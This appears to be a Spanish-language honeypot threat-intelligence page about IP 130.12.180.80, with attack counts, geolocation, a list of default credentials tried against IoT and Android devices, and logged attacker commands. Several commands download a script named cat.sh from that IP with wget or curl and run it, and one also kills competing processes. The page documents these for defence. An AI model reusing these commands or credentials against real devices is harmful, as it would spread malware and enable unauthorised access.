Amenaza Activa • CRITICO
130.12.180.80
🎯
3441
Ataques Totales
🔌
9
Puertos
📡
5
Tipos Ataque
🦠
2
Malware
Geolocalizacion
- Pais
- 🇺🇸 Estados Unidos
- Ciudad
- Desconocida
- ASN
- AS214943
- ISP
- Railnet LLC
Tipos de Ataque
tanner
adbhoney
honeytrap
cowrie
honeyaml
Puertos Atacados
5511222280560805555555622235558
Malware Asociado
Credenciales Intentadas
🔐root/root
14x🔐root/(vacio)
13x🔐admin/admin
9x🔐user/user
8x🔐telecomadmin/admintelecom
7x🔐root/xc3511
7x🔐root/password
5x🔐ubnt/ubnt
5x🔐hikvision/hikvision
5x🔐root/123456
4x🔐pi/raspberry
3x🔐admin/password
3x🔐user/password
3x🔐root/vizxv
3x🔐ftp/ftp
3xComandos Ejecutados
$
cd /data/local/tmp; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android445x$
cd /data/local; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android133x$
echo hello56x$
cd /data/local/tmp; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android52x$
for pid in /proc/[0-9]*; do pid_num="${pid##*/}"; if [ -r "$pid/maps" ]; then suspicious=true; while IFS= read -r line; do case "$line" in *"/lib/"*|*"/lib64/"*|*".so"*) suspicious=false; break;; esac; done < "$pid/maps"; if [ "$suspicious" = true ]; then kill -9 "$pid_num"; fi; fi; done; cd /data/local/tmp; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android41x$
./26x$
cd /data/local/tmp; rm *; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; ./cat.sh android24x$
cat /proc13x$
echo SHELL_TEST13x$
/bin/busybox TEST13xEvaluacion de Riesgo
80
/100
BajoMedioAltoCritico